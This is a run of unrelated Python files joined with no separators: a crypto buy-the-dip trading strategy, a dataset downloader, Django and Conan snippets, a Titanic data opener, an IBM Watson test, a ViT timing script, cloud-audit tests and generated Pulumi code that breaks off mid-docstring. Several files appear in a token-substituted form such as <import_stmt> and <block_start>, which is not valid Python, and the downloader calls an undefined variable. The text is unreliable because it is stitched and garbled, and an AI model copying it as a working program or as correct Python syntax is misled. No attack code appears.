<import_from_stmt>howtrader.app.cta_strategy CtaTemplate StopOrder TickData BarData TradeData OrderData BarGenerator ArrayManager <import_from_stmt>howtrader.trader.constant Interval<import_from_stmt>datetime datetime<import_from_stmt>howtrader.app.cta_strategy.engine CtaEngine EngineType<import_stmt>pandas_ta<as>ta<import_stmt>pandas<as>pd<class_stmt>FixedTradPriceStrategy(CtaTemplate)<block_start>""" 基于价格的定投 """<line_sep>author="51bitquant"<line_sep>fixed_trade_money=1000# 每次定投的资金比例. price_change_pct=0.05# 价格变动多少的时候定投 parameters=['fixed_trade_money' 'price_change_pct']<def_stmt>__init__ self cta_engine:CtaEngine strategy_name vt_symbol setting<block_start>""""""<line_sep>super().__init__(cta_engine strategy_name vt_symbol setting)<line_sep>self.bg_4hour=BarGenerator(self.on_bar 4 self.on_4hour_bar Interval.HOUR)<line_sep>self.am=ArrayManager(size=100)<block_end># 时间序列,类似我们用的pandas, 值保留最近的N个K线的数据. <def_stmt>on_init self<block_start>""" Callback when strategy is inited. """<line_sep>self.write_log("策略初始化")<line_sep>self.load_bar(1)<block_end># 具体加载多少天的数据, 1表示1天的数据,如果是2表示过去2天的数据 <def_stmt>on_start self<block_start>""" Callback when strategy is started. """<line_sep>self.write_log(f"我的策略启动")<line_sep>self.put_event()<block_end><def_stmt>on_stop self<block_start>""" Callback when strategy is stopped. """<line_sep>self.write_log("策略停止")<line_sep>self.put_event()<block_end><def_stmt>on_tick self tick:TickData<block_start><pass><block_end><def_stmt>on_bar self bar:BarData<block_start>""" Callback of new bar data update. """<line_sep>self.bg_4hour.update_bar(bar)# 合成四小时的数据. self.put_event()<block_end><def_stmt>on_4hour_bar self bar:BarData<block_start>""" 四小时的K线数据. """<line_sep>self.cancel_all()# 撤销所有订单. self.am.update_bar(bar)# 把最新的K线放进时间序列里面. # 下面可以计算基数指标等等.... # 以及下单的事情. 
<if_stmt><not>self.am.inited<block_start><return><block_end># [0,1,2,3,4,5,6] last_close_price=self.am.close_array[-2]# 上一根K线 current_close_price=bar.close_price# self.am.close_array[-1] # 当前的收盘价 # 如果四小时价格下跌5%就买入. <if_stmt>(last_close_price-current_close_price)/last_close_price<ge>self.price_change_pct<block_start>price=bar.close_price<times>1.001<line_sep>self.buy(price self.fixed_trade_money/price)<block_end>self.put_event()<block_end><def_stmt>on_order self order:OrderData<block_start>""" 订单的回调方法: 订单状态更新的时候,会调用这个方法。 """<line_sep>self.put_event()<block_end><def_stmt>on_trade self trade:TradeData<block_start>""" """<line_sep>self.put_event()<block_end># 更新UI界面方法。 <def_stmt>on_stop_order self stop_order:StopOrder<block_start>""" 这个是一个停止单的方法,用来监听你止损单的方法。 """<line_sep><pass><block_end><block_end>
# -*- coding: utf-8 -*- <import_stmt>os urllib<class_stmt>Dataset(object)<block_start><def_stmt>__init__ self opt=<none><block_start><if_stmt>opt<is><not><none><block_start>self.setup(opt)<line_sep>self.http_proxy=opt.__dict__.get("proxy" "null")<block_end><else_stmt><block_start>self.name="demo"<line_sep>self.dirname="demo"<line_sep>self.http_proxy="null"<block_end>self.urls=[]<line_sep>self.root=".data"<line_sep>self.saved_path=os.path.join(os.path.join(self.root "clean") self.name)<line_sep>self.formated_files=<none><block_end><def_stmt>setup self opt<block_start>self.name=opt.dataset<line_sep>self.dirname=opt.dataset<line_sep>self.http_proxy=opt.__dict__.get("proxy" "null")<block_end><def_stmt>process self<block_start>dirname=self.download()<line_sep>print("processing dirname: "+dirname)<line_sep><raise>Exception("method in father class have been called in processing: {} dataset".format(opt.dataset))<line_sep><return>dirname<block_end><def_stmt>getFormatedData self<block_start><if_stmt>self.formated_files<is><not><none><block_start><return>self.formated_files<block_end><if_stmt>os.path.exists(self.saved_path)<block_start><return>[os.path.join(self.saved_path filename)<for>filename os.listdir(self.saved_path)]<block_end>self.formated_files=self.process()<line_sep><return>self.formated_files<block_end><def_stmt>download_from_url self url path schedule=<none>#if schedule is None: # schedule=lambda a,b,c : print("%.1f"%(100.0 * a * b / c), end='\r',flush=True) if (int(a * b / c)*100)%10==0 else None <block_start><if_stmt>self.http_proxy<ne>"null"<block_start>proxy=urllib.request.ProxyHandler({'http':self.http_proxy 'https':self.http_proxy})<line_sep># construct a new opener using your proxy settings opener=urllib.request.build_opener(proxy)<line_sep># install the openen on the module-level urllib.request.install_opener(opener)<line_sep>print("proxy in %s"%self.http_proxy)<block_end># urllib.request.urlretrieve(url,path,lambda a,b,c : print("%.1f"%(100.0 * a * b / 
c), end='\r',flush=True) if (int(a * b / c)*1000)%100==0 else None )a <try_stmt><block_start>urllib.request.urlretrieve(url path)<block_end><except_stmt><block_start><import_stmt>urllib2<line_sep>urllib2.urlretrieve(url path)<block_end><return>path<block_end><def_stmt>download self check=<none><block_start>"""Download and unzip an online archive (.zip, .gz, or .tgz). Arguments: check (str or None): Folder whose existence indicates that the dataset has already been downloaded, or None to check the existence of root/{cls.name}. Returns: dataset_path (str): Path to extracted dataset. """<import_stmt>zipfile tarfile<line_sep>path=os.path.join(self.root self.name)<line_sep>check=path<if>check<is><none><else>check<if_stmt><not>os.path.isdir(check)<block_start><for_stmt>url self.urls<block_start><if_stmt>isinstance(url tuple)<block_start>url,filename=url<block_end><else_stmt><block_start>filename=os.path.basename(url)<block_end>zpath=os.path.join(path filename)<if_stmt><not>os.path.isfile(zpath)<block_start><if_stmt><not>os.path.exists(os.path.dirname(zpath))<block_start>os.makedirs(os.path.dirname(zpath))<block_end>print('downloading {}'.format(filename))<line_sep>self.download_from_url(url zpath)<block_end>ext=os.path.splitext(filename)[-1]<if_stmt>ext<eq>'.zip'<block_start><with_stmt>zipfile.ZipFile(zpath 'r')<as>zfile<block_start>print('extracting')<line_sep>zfile.extractall(path)<block_end><block_end><elif_stmt>ext<in>['.gz' '.tgz' ".bz2"]<block_start><with_stmt>tarfile.open(zpath 'r:gz')<as>tar<block_start>dirs=[member<for>member tar.getmembers()]<line_sep>tar.extractall(path=path members=dirs)<block_end><block_end><block_end><block_end><else_stmt><block_start>print("%s do not need to be downloaded"%path)<block_end><return>path<block_end><block_end>
from django.http import HttpResponse


class HttpResponseNoContent(HttpResponse):
    """An HTTP response with status 204 (No Content) and no body expected."""

    status_code = 204
import tensorflow as tf

# Graph fixture: count from 0 up to 10 inside a named TF while-loop.
i = tf.compat.v1.constant(0, name="Hole")


def c(i):
    """Loop condition: keep iterating while the counter is below 10."""
    return tf.compat.v1.less(i, 10)


def b(i):
    """Loop body: increment the counter by one."""
    return tf.compat.v1.add(i, 1)


r = tf.compat.v1.while_loop(c, b, [i], name="While")
from conans import ConanFile, tools
import os

required_conan_version = ">=1.33.0"


class MioConan(ConanFile):
    """Conan recipe for mio, a header-only C++11 memory-mapped file IO library."""

    name = "mio"
    description = "Cross-platform C++11 header-only library for memory mapped file IO."
    license = "MIT"
    topics = ("mio", "mmap", "memory-mapping", "fileviewer")
    homepage = "https://github.com/mandreyel/mio"
    url = "https://github.com/conan-io/conan-center-index"
    settings = "os", "compiler"
    exports_sources = "patches/**"

    @property
    def _source_subfolder(self):
        # Folder the upstream sources are unpacked into.
        return "source_subfolder"

    def validate(self):
        # Header-only library: only the C++ standard level needs checking.
        if self.settings.compiler.get_safe("cppstd"):
            tools.check_min_cppstd(self, 11)

    def package_id(self):
        self.info.header_only()

    def source(self):
        tools.get(**self.conan_data["sources"][self.version],
                  destination=self._source_subfolder, strip_root=True)

    def build(self):
        # Apply any version-specific patches shipped with the recipe.
        for patch in self.conan_data.get("patches", {}).get(self.version, []):
            tools.patch(**patch)

    def package(self):
        self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
        self.copy("*pp", dst="include",
                  src=os.path.join(self._source_subfolder, "include"))

    def package_info(self):
        self.cpp_info.names["cmake_find_package"] = "mio"
        self.cpp_info.names["cmake_find_package_multi"] = "mio"
        headers = self.cpp_info.components["mio-headers"]
        headers.names["cmake_find_package"] = "mio-headers"
        headers.names["cmake_find_package_multi"] = "mio-headers"
        if self.settings.os == "Windows":
            # Windows exposes two extra components that differ only in the
            # WinAPI surface they pull in.
            for comp_name in ("mio_full_winapi", "mio_min_winapi"):
                comp = self.cpp_info.components[comp_name]
                comp.names["cmake_find_package"] = comp_name
                comp.names["cmake_find_package_multi"] = comp_name
            self.cpp_info.components["mio_min_winapi"].defines = [
                "WIN32_LEAN_AND_MEAN", "NOMINMAX"]
import os
import random
import string

import numpy as np
import pandas as pd
import substratools as tools


class TitanicOpener(tools.Opener):
    """Substra opener exposing the Titanic passenger data.

    Features are every CSV column except ``Survived``; the label is the
    ``Survived`` column. ``fake_*`` methods generate random data of the
    same schema for dry-runs/tests.
    """

    def get_X(self, folders):
        """Load the feature matrix from the CSV files found in `folders`."""
        data = self._get_data(folders)
        return self._get_X(data)

    def get_y(self, folders):
        """Load the `Survived` labels from the CSV files found in `folders`."""
        data = self._get_data(folders)
        return self._get_y(data)

    def save_predictions(self, y_pred, path):
        """Persist a predictions DataFrame as CSV (without the index)."""
        with open(path, 'w') as f:
            y_pred.to_csv(f, index=False)

    def get_predictions(self, path):
        """Load a predictions CSV back into a DataFrame."""
        return pd.read_csv(path)

    def fake_X(self, n_samples=None):
        """Return randomly generated features (same schema as the real data)."""
        data = self._fake_data(n_samples)
        return self._get_X(data)

    def fake_y(self, n_samples=None):
        """Return randomly generated labels (same schema as the real data)."""
        data = self._fake_data(n_samples)
        return self._get_y(data)

    @classmethod
    def _get_X(cls, data):
        # Features are every column except the label.
        return data.drop(columns=['Survived'])

    @classmethod
    def _get_y(cls, data):
        return pd.DataFrame(data=data.get('Survived'), columns=['Survived'])

    @classmethod
    def _fake_data(cls, n_samples=None):
        # Cap the fake sample size at 100 rows.
        N_SAMPLES = n_samples if n_samples and n_samples <= 100 else 100
        data = {
            'PassengerId': list(range(N_SAMPLES)),
            'Survived': [random.choice([True, False]) for k in range(N_SAMPLES)],
            'Pclass': [random.choice([1, 2, 3]) for k in range(N_SAMPLES)],
            'Name': ["".join(random.sample(string.ascii_letters, 10)) for k in range(N_SAMPLES)],
            'Sex': [random.choice(['male', 'female']) for k in range(N_SAMPLES)],
            'Age': [random.choice(range(7, 77)) for k in range(N_SAMPLES)],
            'SibSp': [random.choice(range(4)) for k in range(N_SAMPLES)],
            'Parch': [random.choice(range(4)) for k in range(N_SAMPLES)],
            'Ticket': ["".join(random.sample(string.ascii_letters, 10)) for k in range(N_SAMPLES)],
            'Fare': [random.choice(np.arange(15, 150, 0.01)) for k in range(N_SAMPLES)],
            'Cabin': ["".join(random.sample(string.ascii_letters, 3)) for k in range(N_SAMPLES)],
            'Embarked': [random.choice(['C', 'S', 'Q']) for k in range(N_SAMPLES)],
        }
        return pd.DataFrame(data)

    @classmethod
    def _get_data(cls, folders):
        # find csv files
        paths = []
        for folder in folders:
            paths += [os.path.join(folder, f)
                      for f in os.listdir(folder) if f[-4:] == '.csv']
        # BUG FIX: DataFrame.append was deprecated in pandas 1.4 and removed
        # in pandas 2.x; concatenate all files in a single pass instead.
        if not paths:
            return pd.DataFrame()
        return pd.concat([pd.read_csv(path) for path in paths])
# coding: utf-8
from unittest import TestCase
import os
import ibm_watson
import pytest
import json
import time
from ibm_watson.natural_language_understanding_v1 import Features, EntitiesOptions, KeywordsOptions


@pytest.mark.skipif(
    os.getenv('NATURAL_LANGUAGE_UNDERSTANDING_APIKEY') is None,
    reason='requires NATURAL_LANGUAGE_UNDERSTANDING_APIKEY')
class TestNaturalLanguageUnderstandingV1(TestCase):
    """Integration test for the NLU v1 service (skipped without an API key)."""

    def setUp(self):
        # Opt out of data collection and flag the traffic as test traffic.
        self.natural_language_understanding = ibm_watson.NaturalLanguageUnderstandingV1(version='2018-03-16')
        self.natural_language_understanding.set_default_headers({
            'X-Watson-Learning-Opt-Out': '1',
            'X-Watson-Test': '1',
        })

    def test_analyze(self):
        text = ('Bruce Banner is the Hulk and Bruce Wayne is BATMAN! '
                'Superman fears not Banner, but Wayne.')
        features = Features(entities=EntitiesOptions(), keywords=KeywordsOptions())
        response = self.natural_language_understanding.analyze(
            text=text, features=features).get_result()
        assert response is not None
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import functools
import os
import time

from absl import logging
from clu import metric_writers
import flax
import flax.jax_utils as flax_utils
import jax
import jax.numpy as jnp
import ml_collections
import numpy as np
import tensorflow as tf

from vit_jax import checkpoint
from vit_jax import models
from vit_jax.configs import models as config_lib


def inference_time(config: ml_collections.ConfigDict, workdir: str):
    """Runs a number of steps and measures inference time.

    Args:
      config: Experiment configuration; must define `model_name`, `batch`,
        `num_classes`, `image_size`, `initial_steps` (warm-up iterations)
        and `steps` (measured iterations).
      workdir: Directory the metric writer logs hparams and scalars to.
    """
    assert config.batch, f'Expected --config.batch={config.batch} > 0'
    assert config.num_classes, (
        f'Expected --config.num_classes={config.num_classes} > 0')
    assert config.image_size, (
        f'Expected --config.image_size={config.image_size} > 0')

    # Build VisionTransformer architecture
    model_config = config_lib.MODEL_CONFIGS[config.model_name]
    model = models.VisionTransformer(
        num_classes=config.num_classes, **model_config)

    # Make sure initial model parameters (before replication) are on CPU only.
    @functools.partial(jax.jit, backend='cpu')
    def init(rng):
        return model.init(
            rng,
            # Discard the "num_local_devices" dimension for initialization.
            inputs=jnp.ones([1, config.image_size, config.image_size, 3],
                            jnp.float32),
            train=False)

    variables = init(jax.random.PRNGKey(0))
    params_repl = flax_utils.replicate(variables['params'])

    # pmap replicates the models over all TPUs/GPUs
    vit_fn_repl = jax.pmap(functools.partial(model.apply, train=False))
    images = jnp.ones([
        jax.local_device_count(), config.batch // jax.local_device_count(),
        config.image_size, config.image_size, 3], jnp.float32)

    writer = metric_writers.create_default_writer(workdir, asynchronous=False)
    writer.write_hparams(config.to_dict())

    logging.info('Starting training loop; initial compile can take a while...')
    logits = vit_fn_repl(flax.core.FrozenDict(params=params_repl), images)
    logits.block_until_ready()
    logging.info('Done.')

    # Warm-up runs that are intentionally not measured.
    logging.info('Going to run %d inferences WITHOUT measuring...',
                 config.initial_steps)
    for _ in range(config.initial_steps):
        logits = vit_fn_repl(flax.core.FrozenDict(params=params_repl), images)
        logits.block_until_ready()

    logging.info('Going to run %d inferences measuring...', config.steps)
    times = []
    # BUG FIX: the measured loop previously iterated `config.initial_steps`;
    # it must run the `config.steps` iterations announced in the log line.
    for _ in range(config.steps):
        t0 = time.time()
        logits = vit_fn_repl(flax.core.FrozenDict(params=params_repl), images)
        logits.block_until_ready()
        times.append(time.time() - t0)
    logging.info('times=%s', times)

    imgs_sec_core = config.batch / jax.local_device_count() / np.array(times)
    logging.info('imgs_sec_core_min=%f', imgs_sec_core.min())
    logging.info('imgs_sec_core_max=%f', imgs_sec_core.max())
    logging.info('imgs_sec_core_mean=%f', imgs_sec_core.mean())
    logging.info('imgs_sec_core_std=%f', imgs_sec_core.std())
    writer.write_scalars(
        0,
        dict(
            imgs_sec_core_min=imgs_sec_core.min(),
            imgs_sec_core_max=imgs_sec_core.max(),
            imgs_sec_core_mean=imgs_sec_core.mean(),
            imgs_sec_core_std=imgs_sec_core.std(),
        ))
"""Tests for AzWebAppHttp20Event plugin."""<import_stmt>copy<import_stmt>unittest<import_from_stmt>cloudmarker.events azwebapphttp20event<line_sep>base_record={'ext':{'record_type':'web_app_config' 'cloud_type':'azure' 'http20_enabled':<true>} 'com':{'cloud_type':'azure'}}<class_stmt>AzWebAppHttp20EventTest(unittest.TestCase)<block_start>"""Tests for AzWebAppHttp20Event plugin."""<def_stmt>test_com_bucket_missing self<block_start>record=copy.deepcopy(base_record)<line_sep>record['com']=<none><line_sep>plugin=azwebapphttp20event.AzWebAppHttp20Event()<line_sep>events=list(plugin.eval(record))<line_sep>self.assertEqual(events [])<block_end><def_stmt>test_cloud_type_non_azure self<block_start>record=copy.deepcopy(base_record)<line_sep>record['com']['cloud_type']='non_azure'<line_sep>plugin=azwebapphttp20event.AzWebAppHttp20Event()<line_sep>events=list(plugin.eval(record))<line_sep>self.assertEqual(events [])<block_end><def_stmt>test_ext_bucket_missing self<block_start>record=copy.deepcopy(base_record)<line_sep>record['ext']=<none><line_sep>plugin=azwebapphttp20event.AzWebAppHttp20Event()<line_sep>events=list(plugin.eval(record))<line_sep>self.assertEqual(events [])<block_end><def_stmt>test_record_type_non_web_app_config self<block_start>record=copy.deepcopy(base_record)<line_sep>record['ext']['record_type']='non_web_app_config'<line_sep>plugin=azwebapphttp20event.AzWebAppHttp20Event()<line_sep>events=list(plugin.eval(record))<line_sep>self.assertEqual(events [])<block_end><def_stmt>test_http20_enabled self<block_start>record=copy.deepcopy(base_record)<line_sep>record['ext']['http20_enabled']=<true><line_sep>plugin=azwebapphttp20event.AzWebAppHttp20Event()<line_sep>events=list(plugin.eval(record))<line_sep>self.assertEqual(events [])<block_end><def_stmt>test_http20_disabled 
self<block_start>record=copy.deepcopy(base_record)<line_sep>record['ext']['http20_enabled']=<false><line_sep>plugin=azwebapphttp20event.AzWebAppHttp20Event()<line_sep>events=list(plugin.eval(record))<line_sep>self.assertEqual(len(events) 1)<line_sep>self.assertEqual(events[0]['ext']['record_type'] 'web_app_http20_event')<line_sep>self.assertEqual(events[0]['com']['record_type'] 'web_app_http20_event')<block_end><block_end>
# Generated by Django 2.2.13 on 2020-11-28 23:16

from django.db import migrations, models


class Migration(migrations.Migration):
    """Adds a (place_as_int, -created) index to the ranking Statistics model."""

    dependencies = [
        ('ranking', '0055_auto_20201009_0735'),
    ]

    operations = [
        migrations.AddIndex(
            model_name='statistics',
            index=models.Index(
                fields=['place_as_int', '-created'],
                name='ranking_sta_place_a_42252c_idx',
            ),
        ),
    ]
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** <import_stmt>warnings<import_stmt>pulumi<import_stmt>pulumi.runtime<import_from_stmt>typing Any Mapping Optional Sequence Union overload<import_from_stmt>.. _utilities<import_from_stmt>. outputs<import_from_stmt>._inputs *<line_sep>__all__=['WorkloadIdentityPoolProviderArgs' 'WorkloadIdentityPoolProvider']<line_sep>@pulumi.input_type<class_stmt>WorkloadIdentityPoolProviderArgs<block_start><def_stmt>__init__ __self__ * workload_identity_pool_id:pulumi.Input[str] workload_identity_pool_provider_id:pulumi.Input[str] attribute_condition:Optional[pulumi.Input[str]]=<none> attribute_mapping:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none> aws:Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]=<none> description:Optional[pulumi.Input[str]]=<none> disabled:Optional[pulumi.Input[bool]]=<none> display_name:Optional[pulumi.Input[str]]=<none> oidc:Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]=<none> project:Optional[pulumi.Input[str]]=<none><block_start>""" The set of arguments for constructing a WorkloadIdentityPoolProvider resource. :param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. :param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. 
:param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` :param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. 
You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` :param pulumi.Input['WorkloadIdentityPoolProviderAwsArgs'] aws: An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. :param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters. 
:param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. :param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters. :param pulumi.Input['WorkloadIdentityPoolProviderOidcArgs'] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """<line_sep>pulumi.set(__self__ "workload_identity_pool_id" workload_identity_pool_id)<line_sep>pulumi.set(__self__ "workload_identity_pool_provider_id" workload_identity_pool_provider_id)<if_stmt>attribute_condition<is><not><none><block_start>pulumi.set(__self__ "attribute_condition" attribute_condition)<block_end><if_stmt>attribute_mapping<is><not><none><block_start>pulumi.set(__self__ "attribute_mapping" attribute_mapping)<block_end><if_stmt>aws<is><not><none><block_start>pulumi.set(__self__ "aws" aws)<block_end><if_stmt>description<is><not><none><block_start>pulumi.set(__self__ "description" description)<block_end><if_stmt>disabled<is><not><none><block_start>pulumi.set(__self__ "disabled" disabled)<block_end><if_stmt>display_name<is><not><none><block_start>pulumi.set(__self__ "display_name" display_name)<block_end><if_stmt>oidc<is><not><none><block_start>pulumi.set(__self__ "oidc" oidc)<block_end><if_stmt>project<is><not><none><block_start>pulumi.set(__self__ "project" project)<block_end><block_end>@property@pulumi.getter(name="workloadIdentityPoolId")<def_stmt>workload_identity_pool_id self<arrow>pulumi.Input[str]<block_start>""" The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. 
"""<line_sep><return>pulumi.get(self "workload_identity_pool_id")<block_end>@workload_identity_pool_id.setter<def_stmt>workload_identity_pool_id self value:pulumi.Input[str]<block_start>pulumi.set(self "workload_identity_pool_id" value)<block_end>@property@pulumi.getter(name="workloadIdentityPoolProviderId")<def_stmt>workload_identity_pool_provider_id self<arrow>pulumi.Input[str]<block_start>""" The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """<line_sep><return>pulumi.get(self "workload_identity_pool_provider_id")<block_end>@workload_identity_pool_provider_id.setter<def_stmt>workload_identity_pool_provider_id self value:pulumi.Input[str]<block_start>pulumi.set(self "workload_identity_pool_provider_id" value)<block_end>@property@pulumi.getter(name="attributeCondition")<def_stmt>attribute_condition self<arrow>Optional[pulumi.Input[str]]<block_start>""" [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. 
The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` """<line_sep><return>pulumi.get(self "attribute_condition")<block_end>@attribute_condition.setter<def_stmt>attribute_condition self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "attribute_condition" value)<block_end>@property@pulumi.getter(name="attributeMapping")<def_stmt>attribute_mapping self<arrow>Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>""" Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. 
For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` """<line_sep><return>pulumi.get(self "attribute_mapping")<block_end>@attribute_mapping.setter<def_stmt>attribute_mapping self value:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>pulumi.set(self "attribute_mapping" value)<block_end>@property@pulumi.getter<def_stmt>aws self<arrow>Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]<block_start>""" An Amazon Web Services identity provider. Not compatible with the property oidc. 
Structure is documented below. """<line_sep><return>pulumi.get(self "aws")<block_end>@aws.setter<def_stmt>aws self value:Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]<block_start>pulumi.set(self "aws" value)<block_end>@property@pulumi.getter<def_stmt>description self<arrow>Optional[pulumi.Input[str]]<block_start>""" A description for the provider. Cannot exceed 256 characters. """<line_sep><return>pulumi.get(self "description")<block_end>@description.setter<def_stmt>description self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "description" value)<block_end>@property@pulumi.getter<def_stmt>disabled self<arrow>Optional[pulumi.Input[bool]]<block_start>""" Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. """<line_sep><return>pulumi.get(self "disabled")<block_end>@disabled.setter<def_stmt>disabled self value:Optional[pulumi.Input[bool]]<block_start>pulumi.set(self "disabled" value)<block_end>@property@pulumi.getter(name="displayName")<def_stmt>display_name self<arrow>Optional[pulumi.Input[str]]<block_start>""" A display name for the provider. Cannot exceed 32 characters. """<line_sep><return>pulumi.get(self "display_name")<block_end>@display_name.setter<def_stmt>display_name self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "display_name" value)<block_end>@property@pulumi.getter<def_stmt>oidc self<arrow>Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]<block_start>""" An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. 
